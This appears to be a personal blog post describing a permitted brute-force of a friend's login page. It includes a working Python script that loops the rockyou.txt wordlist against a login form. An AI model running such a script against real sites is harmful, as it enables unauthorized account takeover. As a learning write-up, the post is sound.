How I Bruteforced a Friend's Website.

*** Everything Was done after taking Prior Permission from the Owner/devloper of the Website***

My friend had made a website that would serve various class notes related to subjects to the users as a Mini project so when he was showing me his website, I saw the login page, I asked him whether he thought it was Vulnerable or not, he said it is so out of curiosity I asked him if I can try to get in without authentication, And he Agreed :) So I got to work.

While Looking through the website to find anything that I could use to try to get in I found that anyone can view the notes without ever logging In as well as see the user who uploaded the respective file, It was not a Bug but a Feature of the Site, so without any much effort I had usernames for existing user on the site.

Now that i had the usernames I could try to bruteforce the login page using them , so I created a python script to do it for me. This is How i did it .

First I opened My browser and navigated to the Login page and entered a random username and password and pressed the Login Button And.....got an Error : Invalid Credentials , as expected :D , then i viewed the Http-request Body using the Network section of the browser and noted it .

Alright This is the Script ..

First i imported the Requests module , to use the http-requests functionality

import requests

Then i wrote the `login` function and defined the request body as per I noted earlier

url = "https://xxxxx.xxxxxxxxxxx.com/login.php"

def login(username ,password):
	r = requests.post(url,data = {
		"username" :username,
		"password" :password,
		"submit":"Login",

	})
	return r

Next I made a List containing the Most common passwords in the world using the rockyou.txt file which is a wellknown wordlist

passwords = []
with open("rockyou.txt", "r", encoding="latin-1") as h:
	for line in h:
		line = line.strip()
		if line:
			passwords.append(line)
						

Now using the Username which found earlier and the password list we use a For loop to login with our given user name and every passowrd in the list. And at the same time checking the text in the response which did not contain the text "Failed" , so that we could know if an login attempt was successfull.

user="Sallu007"
i=1
for password in passwords:
	response = login(user,password).text


	no = "Failed"
	if no in response:
		print(f"Trying ....count : {i}")
	else:
		print("Found!!!")
		print(f"username {user} Password {password}: ")
		break
	i=i+1

And now lets see how it worked ...

So that was it ...A Simple Login page Bruteforce with a comman password wordlist.

If you liked the Read please check out my Other Blogs and Check out my Socials for more Updates!!!

I'd love to hear from you! Whether you want to chat about shared interests, collaborate on exciting projects, or just have a friendly conversation, don't hesitate to reach out.

Ps : Im a lot easier to get in touch on my Socials

• sairajbmhatre@gmail.com
• Mumbai
  Maharastra , India

• Linkedin